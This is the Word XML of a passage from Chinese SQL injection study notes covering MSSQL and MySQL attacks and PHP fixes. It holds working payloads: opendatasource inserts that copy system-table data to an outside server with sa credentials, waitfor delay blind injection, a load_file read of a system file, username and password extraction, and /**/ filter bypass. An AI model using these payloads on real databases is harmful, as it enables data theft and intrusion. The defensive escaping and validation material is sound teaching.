      <w:r w:rsidR="00B54F98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表，</w:t>
      </w:r>
      <w:r w:rsidR="00B54F98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=2089058478</w:t>
      </w:r>
      <w:r w:rsidR="00B53889">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下面会以取出此表的内容为例。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A65D8" w:rsidRDefault="005A65D8" w:rsidP="00857953"/>
    <w:p w:rsidR="005A65D8" w:rsidRDefault="005A65D8" w:rsidP="00857953">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获得其他库中的表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F34348" w:rsidRDefault="00F34348" w:rsidP="00F34348">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert into opendatasource(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqloledb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erver=119.98.100.50:1433,uid=sa,pwd=test,database=test</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) .test.dbo.biao select [id],[name]</w:t>
      </w:r>
      <w:r w:rsidR="0061095D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="0061095D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.dbo.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where xtype=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00367243">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A65D8" w:rsidRDefault="00AD676A" w:rsidP="00857953">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3131185"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="4" name="图片 3" descr="sysobjects获取数据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objects获取数据表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5D" w:rsidRDefault="0061095D" w:rsidP="00857953">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制系统表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRPr="00BF68E5" w:rsidRDefault="0061095D" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">select * into [aa] from syscolumns </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF68E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>where 1=2</w:t>
      </w:r>
      <w:r w:rsidR="00BF68E5" w:rsidRPr="00BF68E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061095D" w:rsidRDefault="0061095D" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取表里的列</w:t>
      </w:r>
      <w:r w:rsidR="00D63CFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r w:rsidR="003D364B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061095D" w:rsidRDefault="0061095D" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert into opendatasource(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqloledb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erver=119.98.100.50:1433,uid=sa,pwd=test,database=test</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) .test.dbo.aa select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="009765A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidR="00E96AB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=2089058478</w:t>
      </w:r>
      <w:r w:rsidR="00C939AD">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C939AD" w:rsidRDefault="00C939AD" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3790476" cy="2609524"/>
            <wp:effectExtent l="19050" t="0" r="474" b="0"/>
            <wp:docPr id="16" name="图片 1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90F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左图是</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aa</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表的结构，里面存着</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=2089058478</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个表的所有列名</w:t>
      </w:r>
      <w:r w:rsidR="00D9490F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009765A2" w:rsidRDefault="009765A2" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2541905"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="9" name="图片 8" descr="syscolumns获取所有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columns获取所有列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86" w:rsidRDefault="00D63CFF" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就要根据得到的表的列名来建表，获取前几条，重要的数据了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002648B6" w:rsidRPr="002648B6" w:rsidRDefault="00916C23" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1598930"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="3" name="图片 2" descr="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取数据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B9" w:rsidRDefault="00D115B9" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL 2005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面，有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，可以很快猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075403E" w:rsidRDefault="0075403E" w:rsidP="00CD4823"/>
    <w:p w:rsidR="0075403E" w:rsidRDefault="0075403E" w:rsidP="00CD4823"/>
    <w:p w:rsidR="00DF0C22" w:rsidRDefault="00DF0C22" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D115B9" w:rsidRDefault="00D115B9" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mssql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">waitfor delay </w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0:0:5</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>延迟五秒再执行</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00124629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A62DE" w:rsidRDefault="003A62DE" w:rsidP="00CD4823"/>
    <w:p w:rsidR="003A62DE" w:rsidRDefault="003A62DE" w:rsidP="00CD4823"/>
    <w:p w:rsidR="005B2690" w:rsidRDefault="005B2690" w:rsidP="00052779">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc468296490"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00CC7B26" w:rsidRPr="00CC7B26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C7E09" w:rsidRDefault="002C7E09" w:rsidP="003800BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库版本：</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ersion()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C7E09" w:rsidRDefault="002C7E09" w:rsidP="003800BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00405470" w:rsidP="003800BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00665A1A" w:rsidRDefault="00A00D73" w:rsidP="003800BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00D87D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oad_file()</w:t>
      </w:r>
      <w:r w:rsidR="00665A1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:load_file(</w:t>
      </w:r>
      <w:r w:rsidR="00665A1A">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00665A1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c:\boot.ini</w:t>
      </w:r>
      <w:r w:rsidR="00665A1A">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00665A1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)  ==  load_file(char(99,58,92,98,111,111,116,46,105,110,105))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C7E09" w:rsidRDefault="008A5C2D" w:rsidP="006F1A53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>concat(xxxxxxxxxxx,username,</w:t>
      </w:r>
      <w:r w:rsidR="00E80CFA" w:rsidRPr="00E80CFA">
        <w:t xml:space="preserve"> 0x202020C3DCC2EBA3BA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,password)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1A53" w:rsidRDefault="006F1A53" w:rsidP="00EB2752">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CFA">
        <w:t>0x202020C3DCC2EBA3BA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00C86C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C86C99" w:rsidRPr="00C86C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00C86C99" w:rsidRPr="00C86C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码：</w:t>
      </w:r>
      <w:r w:rsidR="00C86C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的编码</w:t>
      </w:r>
      <w:r w:rsidR="004114DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，前面有三个中文半角空格</w:t>
      </w:r>
      <w:r w:rsidR="00EF17C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是标准的英文空格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584A15" w:rsidRDefault="003A71DE" w:rsidP="00EB2752">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2572385"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="20" name="图片 1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0B" w:rsidRDefault="00F01968" w:rsidP="00EB2752">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="00043A0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL_En</w:t>
      </w:r>
      <w:r w:rsidR="004768C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="004768C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidR="004768C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的编码方式</w:t>
      </w:r>
      <w:r w:rsidR="00281293">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1A53" w:rsidRDefault="006F1A53" w:rsidP="00EB2752"/>
    <w:p w:rsidR="006F1A53" w:rsidRDefault="006F1A53" w:rsidP="00EB2752"/>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="006250EF">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc468296491"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入绕过（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CRUD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增删改查）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="006250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/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB41CA" w:rsidRDefault="00DB41CA" w:rsidP="006250EF"/>
    <w:p w:rsidR="00755291" w:rsidRDefault="004F766A" w:rsidP="00B540D8">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc468296492"/>
      <w:r w:rsidRPr="004F766A">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="004F766A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入修补：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00501098" w:rsidRDefault="00501098" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501098" w:rsidRDefault="00501098" w:rsidP="00501098">
      <w:r w:rsidRPr="00182CC5">
        <w:t>bool ctype_alnum ( string $text )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查字符串是否只包含字母数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501098" w:rsidRDefault="00501098" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00D36873" w:rsidRDefault="00D36873" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00D36873" w:rsidRDefault="005D0D80" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B208C" w:rsidRDefault="006B208C" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="006B208C" w:rsidRDefault="006B208C" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00D36873" w:rsidRDefault="006B208C" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D36873" w:rsidRDefault="00D36873" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00297487" w:rsidRDefault="00297487" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="005F30EE" w:rsidRDefault="002C0CBC" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义</w:t>
      </w:r>
      <w:r w:rsidR="002F1B41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（转义之后为普通字符含义</w:t>
      </w:r>
      <w:r w:rsidR="00CE2180">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，与编码</w:t>
      </w:r>
      <w:r w:rsidR="009A339F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
      <w:r w:rsidR="002F1B41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="005F30EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7EAF" w:rsidRDefault="002E7EAF" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F766A" w:rsidRDefault="00290769" w:rsidP="00AC6A72">
      <w:r w:rsidRPr="00290769">
        <w:t>string mysql_real_escape_string ( string $unescaped_string [, resource $link_identifier = NULL ] )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290769" w:rsidRDefault="006030CC" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此函数会</w:t>
      </w:r>
      <w:r w:rsidR="00BB4117" w:rsidRPr="00BB4117">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在以下字符前添加反斜杠</w:t>
      </w:r>
      <w:r w:rsidR="00BB4117" w:rsidRPr="00BB4117">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: \x00, \n, \r, \, ', " </w:t>
      </w:r>
      <w:r w:rsidR="00BB4117" w:rsidRPr="00BB4117">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00BB4117" w:rsidRPr="00BB4117">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> \x1a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00755291" w:rsidRDefault="00755291" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用</w:t>
      </w:r>
      <w:r w:rsidR="002E7EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24B91" w:rsidRPr="00161D87" w:rsidRDefault="00161D87" w:rsidP="00AC6A72">
      <w:r w:rsidRPr="00161D87">
        <w:t>string addslashes ( string $str )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2498A" w:rsidRDefault="00F2498A" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00365660" w:rsidRDefault="00365660" w:rsidP="00AC6A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换为整数值：</w:t>
      </w:r>
      <w:r w:rsidRPr="00365660">
        <w:t>int intval ( mixed $var [, int $base = 10 ] )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D7DC7" w:rsidRDefault="005D7DC7" w:rsidP="00AC6A72">
      <w:r w:rsidRPr="005D7DC7">
        <w:t>bool settype ( mixed &amp;$var , string $type )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005D7DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将变量</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> var </w:t>
      </w:r>
      <w:r w:rsidRPr="005D7DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类型设置成</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> type</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2498A" w:rsidRDefault="00F2498A" w:rsidP="00AC6A72"/>
    <w:p w:rsidR="00F2498A" w:rsidRDefault="00F2498A" w:rsidP="006250EF"/>
    <w:p w:rsidR="00494E25" w:rsidRDefault="00F32AA8" w:rsidP="006250EF">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc468296493"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00F32AA8" w:rsidRDefault="00F32AA8" w:rsidP="006250EF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>U</w:t>
